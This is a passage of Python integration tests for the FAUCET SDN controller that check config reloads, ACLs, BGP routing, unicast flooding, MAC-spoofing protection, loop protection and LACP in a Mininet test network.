restart=True, cold_start=False, change_expected=False)
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
self.assertEqual(good_config_hash_info, event['CONFIG_CHANGE']['config_hash_info'])
def test_port_change_vlan(self):
first_host, second_host = self.hosts_name_ordered()[:2]
third_host, fourth_host = self.hosts_name_ordered()[2:]
self.ping_all_when_learned()
self.change_port_config(
self.port_map['port_1'], 'native_vlan', 200,
restart=False, cold_start=False)
self.wait_until_matching_flow(
{'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.change_port_config(
self.port_map['port_2'], 'native_vlan', 200,
restart=True, cold_start=False)
for port_name in ('port_1', 'port_2'):
self.wait_until_matching_flow(
{'in_port': int(self.port_map[port_name])},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:4296}'])
self.one_ipv4_ping(first_host, second_host.IP(), require_host_learned=False)
# hosts 1 and 2 now in VLAN 200, so they shouldn't see floods for 3 and 4.
self.verify_vlan_flood_limited(
third_host, fourth_host, first_host)
    def test_port_change_acl(self):
        """Apply an ACL to a port, verify it blocks traffic, then revert it."""
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # Snapshot the running config so we can restore it below.
        orig_conf = self._get_faucet_conf()
        self.change_port_config(
            self.port_map['port_1'], 'acl_in', 1,
            cold_start=False)
        # ACL rule (match on TCP dst 5001) must appear in the port ACL table.
        self.wait_until_matching_flow(
            {'in_port': int(self.port_map['port_1']),
             'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
            table_id=self._PORT_ACL_TABLE, cookie=self.ACL_COOKIE)
        self.wait_until_matching_flow(
            {'vlan_vid': 100}, table_id=self._ETH_SRC_TABLE,
            actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
        self.verify_tp_dst_blocked(5001, first_host, second_host)
        self.verify_tp_dst_notblocked(5002, first_host, second_host)
        # Restore the original (ACL-less) config; both ports must pass again.
        self.reload_conf(
            orig_conf, self.faucet_config_path,
            restart=True, cold_start=False, host_cache=100)
        self.verify_tp_dst_notblocked(
            5001, first_host, second_host, table_id=None)
        self.verify_tp_dst_notblocked(
            5002, first_host, second_host, table_id=None)
    def test_port_change_perm_learn(self):
        """Verify permanent_learn protects a port's MAC, and ACLs still apply after."""
        first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
        self.change_port_config(
            self.port_map['port_1'], 'permanent_learn', True,
            restart=True, cold_start=False)
        self.ping_all_when_learned(hard_timeout=0)
        # Third host impersonates first host's MAC; its traffic must be dropped
        # (100% ping loss) while the legitimate host keeps working.
        original_third_host_mac = third_host.MAC()
        third_host.setMAC(first_host.MAC())
        self.assertEqual(100.0, self.ping((second_host, third_host)))
        self.retry_net_ping(hosts=(first_host, second_host))
        # Impersonation ends; everything recovers.
        third_host.setMAC(original_third_host_mac)
        self.ping_all_when_learned(hard_timeout=0)
        # An ACL change on the permanently-learned port must still take effect.
        self.change_port_config(
            self.port_map['port_1'], 'acl_in', 1,
            restart=True, cold_start=False)
        self.wait_until_matching_flow(
            {'in_port': int(self.port_map['port_1']),
             'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
            table_id=self._PORT_ACL_TABLE)
        self.verify_tp_dst_blocked(5001, first_host, second_host)
        self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetDeleteConfigReloadTest(FaucetConfigReloadTestBase):
    """Verify that replacing a DP's entire interface config forces a cold start."""

    def test_delete_interface(self):
        """Replace all interfaces with a single port; expect a cold start.

        With all ports changed, we should cold start.
        """
        conf = self._get_faucet_conf()
        # Assignment replaces the whole 'interfaces' mapping; the previous
        # `del conf['dps'][self.DP_NAME]['interfaces']` was redundant.
        conf['dps'][self.DP_NAME]['interfaces'] = {
            int(self.port_map['port_1']): {
                'native_vlan': 100,
                'tagged_vlans': [200],
            }
        }
        self.reload_conf(
            conf, self.faucet_config_path,
            restart=True, cold_start=True, change_expected=True)
class FaucetRouterConfigReloadTest(FaucetConfigReloadTestBase):
    """Verify that adding an inter-VLAN router section reloads with a cold start."""

    def test_router_config_reload(self):
        """Adding a router joining VLANs 100 and 200 must cold start on reload."""
        new_conf = self._get_faucet_conf()
        router_conf = {'vlans': [100, 200]}
        new_conf['routers'] = {'router-1': router_conf}
        self.reload_conf(
            new_conf, self.faucet_config_path,
            restart=True, cold_start=True, change_expected=True)
class FaucetConfigReloadAclTest(FaucetConfigReloadTestBase):
    """Verify ACL config changes are applied across warm reloads."""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acls_in: [allow]
            %(port_2)d:
                native_vlan: 100
                acl_in: allow
            %(port_3)d:
                native_vlan: 100
                acl_in: deny
            %(port_4)d:
                native_vlan: 100
                acl_in: deny
"""
    def _verify_hosts_learned(self, hosts):
        # Ping everything, then require exactly these hosts learned on VLAN 100.
        self.ping_all()
        for host in hosts:
            self.require_host_learned(host)
        self.assertEqual(len(hosts), self.scrape_prometheus_var(
            'vlan_hosts_learned', {'vlan': '100'}))
    def test_port_acls(self):
        """Flip port 3's ACL to allow and stack ACLs on port 1; verify filtering."""
        # When stat-based reload is enabled, HUP signalling is not used.
        hup = not self.STAT_RELOAD
        first_host, second_host, third_host = self.hosts_name_ordered()[:3]
        # Port 3 starts with the 'deny' ACL, so only hosts 1 and 2 learn.
        self._verify_hosts_learned((first_host, second_host))
        self.change_port_config(
            self.port_map['port_3'], 'acl_in', 'allow',
            restart=True, cold_start=False, hup=hup)
        self.change_port_config(
            self.port_map['port_1'], 'acls_in', [3, 4, 'allow'],
            restart=True, cold_start=False, hup=hup)
        self.coldstart_conf(hup=hup)
        self._verify_hosts_learned((first_host, second_host, third_host))
        # ACLs 3 and 4 on port 1 block TCP dst ports 5001 and 5003 respectively
        # (per FaucetConfigReloadTestBase fixtures); 5002 remains open.
        self.verify_tp_dst_blocked(5001, first_host, second_host)
        self.verify_tp_dst_notblocked(5002, first_host, second_host)
        self.verify_tp_dst_blocked(5003, first_host, second_host)
class FaucetConfigReloadMACFlushTest(FaucetConfigReloadTestBase):
    """Verify learned MACs are flushed when ports change native VLAN."""
    def test_port_change_vlan(self):
        """Move ports 1 and 2 to VLAN 200 and verify all learned MACs are flushed."""
        self.ping_all_when_learned()
        # 4 hosts learned before the change.
        self.assertEqual(4, len(self.scrape_prometheus(var='learned_l2_port')))
        self.change_port_config(
            self.port_map['port_1'], 'native_vlan', 200,
            restart=False, cold_start=False)
        self.wait_until_matching_flow(
            {'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
            actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
        self.change_port_config(
            self.port_map['port_2'], 'native_vlan', 200,
            restart=True, cold_start=False)
        for port_name in ('port_1', 'port_2'):
            # 4296 == 0x1000 (OFPVID_PRESENT) | 200.
            self.wait_until_matching_flow(
                {'in_port': int(self.port_map[port_name])},
                table_id=self._VLAN_TABLE,
                actions=['SET_FIELD: {vlan_vid:4296}'])
        # VLAN change must flush all previously learned MACs.
        self.assertEqual(0, len(self.scrape_prometheus(var='learned_l2_port')))
class FaucetConfigReloadEmptyAclTest(FaucetConfigReloadTestBase):
    """Verify that setting an empty ACL list is accepted and is a no-op change."""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 300
            %(port_4)d:
                native_vlan: 100
"""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
    200:
        description: "untagged"
    300:
        description: "untagged"
        acls_in: [1]
"""
    # Use the stat()-based config change detection rather than HUP.
    STAT_RELOAD = '1'
    def test_port_acls(self):
        """Setting acls_in to [] on ports must reload cleanly with no dataplane change."""
        hup = not self.STAT_RELOAD
        self.change_port_config(
            self.port_map['port_3'], 'acls_in', [],
            restart=True, cold_start=False, hup=hup, change_expected=False)
        self.change_port_config(
            self.port_map['port_1'], 'acls_in', [],
            restart=True, cold_start=False, hup=hup, change_expected=False)
class FaucetConfigStatReloadAclTest(FaucetConfigReloadAclTest):
    """Repeat the ACL reload tests with stat()-based config change detection."""
    # Use the stat-based reload method.
    STAT_RELOAD = '1'
class FaucetUntaggedBGPDualstackDefaultRouteTest(FaucetUntaggedTest):
    """Test IPv4 routing and import default route from BGP."""
    # BGP speaker listens on both IPv4 and IPv6 loopback (dualstack).
    NUM_FAUCET_CONTROLLERS = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["10.0.0.254/24", "fc00::1:254/112"]
routers:
    router1:
        bgp:
            as: 1
            connect_mode: "passive"
            port: %(bgp_port)d
            routerid: "1.1.1.1"
            server_addresses: ["127.0.0.1", "::1"]
            neighbor_addresses: ["127.0.0.1", "::1"]
            vlan: 100
""" + """
            neighbor_as: %u
""" % PEER_BGP_AS
    CONFIG = """
        arp_neighbor_timeout: 2
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
    # Peer advertises only a default route.
    exabgp_peer_conf = """
    static {
      route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
    }
"""
    exabgp_log = None
    exabgp_err = None
    config_ports = {'bgp_port': None}
    def post_start_net(self):
        # Start the exabgp peer only after the network is up.
        exabgp_conf = self.get_exabgp_conf(
            mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
        self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
    def test_untagged(self):
        """Test IPv4 routing, and BGP routes received."""
        self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
        first_host, second_host = self.hosts_name_ordered()[:2]
        first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
        # /32 host route form of the alias address.
        first_host_alias_host_ip = ipaddress.ip_interface(
            ipaddress.ip_network(first_host_alias_ip.ip))
        self.host_ipv4_alias(first_host, first_host_alias_ip)
        self.wait_bgp_up(
            mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
        self.assertGreater(
            self.scrape_prometheus_var(
                'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
            0)
        self.wait_exabgp_sent_updates(self.exabgp_log)
        self.add_host_route(
            second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
        # NOTE(review): pings twice — presumably first ping triggers nexthop
        # resolution via the imported default route; confirm intent.
        for _ in range(2):
            self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
        self.one_ipv4_controller_ping(first_host)
        self.coldstart_conf()
class FaucetUntaggedBGPIPv4DefaultRouteTest(FaucetUntaggedTest):
    """Test IPv4 routing and import default route from BGP."""
    # IPv4-only variant of the dualstack default-route test.
    NUM_FAUCET_CONTROLLERS = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["10.0.0.254/24"]
routers:
    router1:
        bgp:
            as: 1
            connect_mode: "passive"
            port: %(bgp_port)d
            routerid: "1.1.1.1"
            server_addresses: ["127.0.0.1"]
            neighbor_addresses: ["127.0.0.1"]
            vlan: 100
""" + """
            neighbor_as: %u
""" % PEER_BGP_AS
    CONFIG = """
        arp_neighbor_timeout: 2
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
    # Peer advertises only a default route.
    exabgp_peer_conf = """
    static {
      route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
    }
"""
    exabgp_log = None
    exabgp_err = None
    config_ports = {'bgp_port': None}
    def post_start_net(self):
        # Start the exabgp peer only after the network is up.
        exabgp_conf = self.get_exabgp_conf(
            mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
        self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
    def test_untagged(self):
        """Test IPv4 routing, and BGP routes received."""
        self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
        first_host, second_host = self.hosts_name_ordered()[:2]
        first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
        # /32 host route form of the alias address.
        first_host_alias_host_ip = ipaddress.ip_interface(
            ipaddress.ip_network(first_host_alias_ip.ip))
        self.host_ipv4_alias(first_host, first_host_alias_ip)
        self.wait_bgp_up(
            mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
        self.assertGreater(
            self.scrape_prometheus_var(
                'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
            0)
        self.wait_exabgp_sent_updates(self.exabgp_log)
        self.add_host_route(
            second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
        self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
        self.one_ipv4_controller_ping(first_host)
        self.coldstart_conf()
class FaucetUntaggedBGPIPv4RouteTest(FaucetUntaggedTest):
    """Test IPv4 routing and import from BGP."""
    NUM_FAUCET_CONTROLLERS = 1
    NUM_GAUGE_CONTROLLERS = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["10.0.0.254/24"]
        routes:
            - route:
                ip_dst: 10.99.99.0/24
                ip_gw: 10.0.0.1
routers:
    router1:
        bgp:
            as: 1
            connect_mode: "passive"
            port: %(bgp_port)d
            routerid: "1.1.1.1"
            server_addresses: ["127.0.0.1"]
            neighbor_addresses: ["127.0.0.1"]
            vlan: 100
""" + """
            neighbor_as: %u
""" % PEER_BGP_AS
    CONFIG = """
        arp_neighbor_timeout: 2
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
    # Peer routes: 10.0.1-3.0/24 are importable; 10.0.4.0/24 has FAUCET's own
    # VIP as nexthop and 10.0.5.0/24 a nexthop outside the VLAN — both invalid.
    exabgp_peer_conf = """
    static {
      route 10.0.1.0/24 next-hop 10.0.0.1 local-preference 100;
      route 10.0.2.0/24 next-hop 10.0.0.2 local-preference 100;
      route 10.0.3.0/24 next-hop 10.0.0.2 local-preference 100;
      route 10.0.4.0/24 next-hop 10.0.0.254;
      route 10.0.5.0/24 next-hop 10.10.0.1;
    }
"""
    exabgp_log = None
    exabgp_err = None
    config_ports = {'bgp_port': None}

    def post_start_net(self):
        # Start the exabgp peer only after the network is up.
        exabgp_conf = self.get_exabgp_conf(
            mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
        self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)

    def test_untagged(self):
        """Test IPv4 routing, and BGP routes received."""
        self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
        first_host, second_host = self.hosts_name_ordered()[:2]
        # wait until 10.0.0.1 has been resolved
        self.wait_for_route_as_flow(
            first_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'))
        self.wait_bgp_up(
            mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
        # default=0 so a missing metric yields a clean assertion failure
        # rather than assertGreater(None, 0) raising TypeError (consistent
        # with the sibling BGP tests).
        self.assertGreater(
            self.scrape_prometheus_var(
                'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
            0)
        self.wait_exabgp_sent_updates(self.exabgp_log)
        # The two invalid advertisements must be rejected and logged.
        self.verify_invalid_bgp_route(r'.+10.0.4.0\/24.+cannot be us$')
        self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
        self.wait_for_route_as_flow(
            second_host.MAC(), ipaddress.IPv4Network('10.0.3.0/24'))
        self.verify_ipv4_routing_mesh()
        self.flap_all_switch_ports()
        self.verify_ipv4_routing_mesh()
        for host in first_host, second_host:
            self.one_ipv4_controller_ping(host)
        self.verify_traveling_dhcp_mac()
class FaucetUntaggedIPv4RouteTest(FaucetUntaggedTest):
    """Test IPv4 routing and export to BGP."""
    NUM_FAUCET_CONTROLLERS = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["10.0.0.254/24"]
        routes:
            - route:
                ip_dst: "10.0.1.0/24"
                ip_gw: "10.0.0.1"
            - route:
                ip_dst: "10.0.2.0/24"
                ip_gw: "10.0.0.2"
            - route:
                ip_dst: "10.0.3.0/24"
                ip_gw: "10.0.0.2"
routers:
    router1:
        bgp:
            as: 1
            connect_mode: "passive"
            port: %(bgp_port)d
            routerid: "1.1.1.1"
            server_addresses: ["127.0.0.1"]
            neighbor_addresses: ["127.0.0.1"]
            vlan: 100
""" + """
            neighbor_as: %u
""" % PEER_BGP_AS
    CONFIG = """
        arp_neighbor_timeout: 2
        max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
    exabgp_log = None
    exabgp_err = None
    config_ports = {'bgp_port': None}

    def post_start_net(self):
        # Peer has no static routes of its own; it only receives ours.
        exabgp_conf = self.get_exabgp_conf(mininet_test_util.LOCALHOST)
        self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)

    def test_untagged(self):
        """Test IPv4 routing, and BGP routes sent."""
        self.verify_ipv4_routing_mesh()
        self.flap_all_switch_ports()
        self.verify_ipv4_routing_mesh()
        self.wait_bgp_up(
            mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
        # default=0 so a missing metric yields a clean assertion failure
        # rather than assertGreater(None, 0) raising TypeError (consistent
        # with the sibling BGP tests).
        self.assertGreater(
            self.scrape_prometheus_var(
                'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}, default=0),
            0)
        # exabgp should have received our BGP updates
        updates = self.exabgp_updates(self.exabgp_log)
        for route_string in (
                '10.0.0.0/24 next-hop 10.0.0.254',
                '10.0.1.0/24 next-hop 10.0.0.1',
                '10.0.2.0/24 next-hop 10.0.0.2',
                '10.0.3.0/24 next-hop 10.0.0.2'):
            self.assertTrue(re.search(route_string, updates), msg=updates)
        # test nexthop expired when port goes down
        first_host = self.hosts_name_ordered()[0]
        match, table = self.match_table(ipaddress.IPv4Network('10.0.0.1/32'))
        ofmsg = None
        # Poll for the host route flow to appear (up to 5s).
        for _ in range(5):
            self.one_ipv4_controller_ping(first_host)
            ofmsg = self.get_matching_flow(match, table_id=table)
            if ofmsg:
                break
            time.sleep(1)
        self.assertTrue(ofmsg, msg=match)
        self.set_port_down(self.port_map['port_1'])
        # Poll for the host route flow to be expired (up to 5s).
        for _ in range(5):
            if not self.get_matching_flow(match, table_id=table):
                return
            time.sleep(1)
        self.fail('host route %s still present' % match)
class FaucetUntaggedRestBcastIPv4RouteTest(FaucetUntaggedIPv4RouteTest):
    """Repeat the IPv4 route/BGP-export tests with restricted broadcast ARP/ND on all ports."""
    CONFIG = """
        arp_neighbor_timeout: 2
        max_resolve_backoff_time: 1
        interfaces:
            %(port_1)d:
                native_vlan: 100
                restricted_bcast_arpnd: true
            %(port_2)d:
                native_vlan: 100
                restricted_bcast_arpnd: true
            %(port_3)d:
                native_vlan: 100
                restricted_bcast_arpnd: true
            %(port_4)d:
                native_vlan: 100
                restricted_bcast_arpnd: true
"""
class FaucetUntaggedVLanUnicastFloodTest(FaucetUntaggedTest):
    """With VLAN unicast flooding enabled, unknown unicast must be flooded."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: True
"""
    CONFIG = CONFIG_BOILER_UNTAGGED
    def test_untagged(self):
        """Unknown-destination unicast traffic is flooded to port 1."""
        self.ping_all_when_learned()
        self.assertTrue(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoVLanUnicastFloodTest(FaucetUntaggedTest):
    """With VLAN unicast flooding disabled, unknown unicast must NOT be flooded."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
"""
    CONFIG = CONFIG_BOILER_UNTAGGED
    def test_untagged(self):
        """Unknown-destination unicast traffic is not flooded to port 1."""
        self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedPortUnicastFloodTest(FaucetUntaggedTest):
    """Port-level unicast_flood cannot override a VLAN-level flood disable."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                unicast_flood: True
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
    def test_untagged(self):
        # VLAN level config to disable flooding takes precedence,
        # cannot enable port-only flooding.
        self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoPortUnicastFloodTest(FaucetUntaggedTest):
    """Port-level unicast_flood: False suppresses flooding to that port."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: True
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                unicast_flood: False
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
    def test_untagged(self):
        # VLAN floods, but port 1 opted out: no flood seen there.
        self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedHostMoveTest(FaucetUntaggedTest):
    """Verify a host moving between ports is re-learned and a move event is emitted."""
    def test_untagged(self):
        """Swap two hosts' MACs and expect L2_LEARN events with previous_port_no."""
        self._enable_event_log()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        for _ in range(2):
            self.retry_net_ping(hosts=(first_host, second_host))
            self.ping((first_host, second_host))
            for host, in_port in (
                    (first_host, self.port_map['port_1']),
                    (second_host, self.port_map['port_2'])):
                self.require_host_learned(host, in_port=in_port)
            # Simulate a host move by exchanging the two hosts' MAC addresses.
            self.swap_host_macs(first_host, second_host)
        for port in (self.port_map['port_1'], self.port_map['port_2']):
            self.wait_until_matching_lines_from_file(
                r'.+L2_LEARN.+"previous_port_no": %u.+' % port, self.event_log)
class FaucetUntaggedHostPermanentLearnTest(FaucetUntaggedTest):
    """Verify permanent_learn pins a MAC to its port against spoofing."""
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                permanent_learn: True
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
    def test_untagged(self):
        """A spoofing host cannot displace a permanently learned MAC."""
        self.ping_all_when_learned(hard_timeout=0)
        first_host, second_host, third_host = self.hosts_name_ordered()[:3]
        self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
        # 3rd host impersonates 1st but 1st host still OK
        original_third_host_mac = third_host.MAC()
        third_host.setMAC(first_host.MAC())
        # Spoofed traffic is fully dropped (100% loss) and the MAC stays on port 1.
        self.assertEqual(100.0, self.ping((second_host, third_host)))
        self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
        self.assertFalse(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_3']))
        self.retry_net_ping(hosts=(first_host, second_host))
        # 3rd host stops impersonating, now everything fine again.
        third_host.setMAC(original_third_host_mac)
        self.ping_all_when_learned(hard_timeout=0)
class FaucetCoprocessorTest(FaucetUntaggedTest):
    """Verify a coprocessor port can inject packets directly into the pipeline."""
    N_UNTAGGED = 3
    N_TAGGED = 1
    CONFIG = """
        interfaces:
            %(port_1)d:
                coprocessor: {strategy: vlan_vid}
                mirror: %(port_4)d
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
    def test_untagged(self):
        # Inject packet into pipeline using coprocessor.
        coprocessor_host, first_host, second_host, _ = self.hosts_name_ordered()
        self.one_ipv4_ping(first_host, second_host.IP())
        tcpdump_filter = ' and '.join((
            'ether dst %s' % first_host.MAC(),
            'ether src %s' % coprocessor_host.MAC(),
            'icmp'))
        cmds = [
            # Static ARP entry: the coprocessor host does not take part in learning.
            lambda: coprocessor_host.cmd(
                'arp -s %s %s' % (first_host.IP(), first_host.MAC())),
            lambda: coprocessor_host.cmd(
                'fping %s -c3 %s' % (self.FPING_ARGS_SHORT, first_host.IP())),
        ]
        tcpdump_txt = self.tcpdump_helper(
            first_host, tcpdump_filter, cmds, timeout=5, vflags='-vv', packets=1)
        # NOTE(review): assertFalse with packets=0 appears to assert that the
        # capture did NOT see zero packets, i.e. injected ICMP was delivered —
        # confirm tcpdump_rx_packets() semantics.
        self.assertFalse(self.tcpdump_rx_packets(tcpdump_txt, packets=0))
class FaucetUntaggedLoopTest(FaucetTest):
    """Verify loop_protect bans learning on looped ports and recovers after."""
    NUM_DPS = 1
    N_TAGGED = 0
    N_UNTAGGED = 2
    # Two links per host so a loop can be wired up on the second host.
    LINKS_PER_HOST = 2
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""
    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
                loop_protect: True
            %(port_4)d:
                native_vlan: 100
                loop_protect: True
"""
    def setUp(self):
        super().setUp()
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
            links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
        self.start_net()
    def total_port_bans(self):
        """Return the sum of learn bans over all host-facing ports."""
        total_bans = 0
        for i in range(self.LINKS_PER_HOST * self.N_UNTAGGED):
            port_labels = self.port_labels(self.port_map['port_%u' % (i + 1)])
            total_bans += self.scrape_prometheus_var(
                'port_learn_bans', port_labels, dpid=True, default=0)
        return total_bans
    def test_untagged(self):
        """Wire a loop via the second host; FAUCET must ban learning, then recover."""
        first_host, second_host = self.hosts_name_ordered()
        # Normal learning works
        self.one_ipv4_ping(first_host, second_host.IP())
        start_bans = self.total_port_bans()
        # Create a loop between interfaces on second host - a veth pair,
        # with two bridges, each connecting one leg of the pair to a host
        # interface.
        self.quiet_commands(second_host, (
            'ip link add name veth-loop1 type veth peer name veth-loop2',
            'ip link set veth-loop1 up',
            'ip link set veth-loop2 up',
            # TODO: tune for loop mitigation performance.
            'tc qdisc add dev veth-loop1 root tbf rate 1000kbps latency 10ms burst 1000',
            'tc qdisc add dev veth-loop2 root tbf rate 1000kbps latency 10ms burst 1000',
            # Connect one leg of veth pair to first host interface.
            'brctl addbr br-loop1',
            'brctl setfd br-loop1 0',
            'ip link set br-loop1 up',
            'brctl addif br-loop1 veth-loop1',
            'brctl addif br-loop1 %s-eth0' % second_host.name,
            # Connect other leg of veth pair.
            'brctl addbr br-loop2',
            'brctl setfd br-loop2 0',
            'ip link set br-loop2 up',
            'brctl addif br-loop2 veth-loop2',
            'brctl addif br-loop2 %s-eth1' % second_host.name))
        # Flood some traffic into the loop
        for _ in range(3):
            first_host.cmd('fping %s -c3 10.0.0.254' % self.FPING_ARGS_SHORT)
            end_bans = self.total_port_bans()
            if end_bans > start_bans:
                return
            time.sleep(1)
        self.assertGreater(end_bans, start_bans)
        # Break the loop, and learning should work again
        self.quiet_commands(second_host, (
            'ip link set veth-loop1 down',
            'ip link set veth-loop2 down',))
        self.one_ipv4_ping(first_host, second_host.IP())
class FaucetUntaggedIPv4LACPTest(FaucetTest):
    """Verify LACP aggregation between a Linux 802.3ad bond and FAUCET."""
    NUM_DPS = 1
    N_TAGGED = 0
    N_UNTAGGED = 2
    # Two links per host: first host's two links form the LAG.
    LINKS_PER_HOST = 2
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        faucet_vips: ["10.0.0.254/24"]
"""
    CONFIG = """
        max_resolve_backoff_time: 1
        lacp_timeout: 3
        interfaces:
            %(port_1)d:
                native_vlan: 100
                lacp: 1
                lacp_port_priority: 1
                lacp_port_id: 100
            %(port_2)d:
                native_vlan: 100
                lacp: 1
                lacp_port_priority: 2
                lacp_port_id: 101
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
    def setUp(self):
        super().setUp()
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
            links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
        self.start_net()
    def test_untagged(self):
        """Bond first host's links, flap LAG members, and verify connectivity."""
        first_host = self.hosts_name_ordered()[0]
        def get_lacp_port_id(port):
            # LACP port id as exported by FAUCET's Prometheus metrics.
            port_labels = self.port_labels(port)
            lacp_port_id = self.scrape_prometheus_var('lacp_port_id', port_labels, default=0)
            return lacp_port_id
        bond = 'bond0'
        # Linux driver should have this state (0x3f/63)
        #
        # Actor State: 0x3f, LACP Activity, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
        # .... ...1 = LACP Activity: Active
        # .... ..1. = LACP Timeout: Short Timeout
        # .... .1.. = Aggregation: Aggregatable
        # .... 1... = Synchronization: In Sync
        # ...1 .... = Collecting: Enabled
        # ..1. .... = Distributing: Enabled
        # .0.. .... = Defaulted: No
        # 0... .... = Expired: No
        # [Actor State Flags: **DCSGSA]
        # FAUCET should have this state (0x3e/62)
        # Actor State: 0x3e, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
        # .... ...0 = LACP Activity: Passive
        # .... ..1. = LACP Timeout: Short Timeout
        # .... .1.. = Aggregation: Aggregatable
        # .... 1... = Synchronization: In Sync
        # ...1 .... = Collecting: Enabled
        # ..1. .... = Distributing: Enabled
        # .0.. .... = Defaulted: No
        # 0... .... = Expired: No
        # [Actor State Flags: **DCSGS*]
        lag_ports = (1, 2)
        # Expected /proc/net/bonding/<bond> content once both slaves sync.
        synced_state_txt = r"""
Slave Interface: \S+-eth0
MII Status: up
Speed: \d+ Mbps
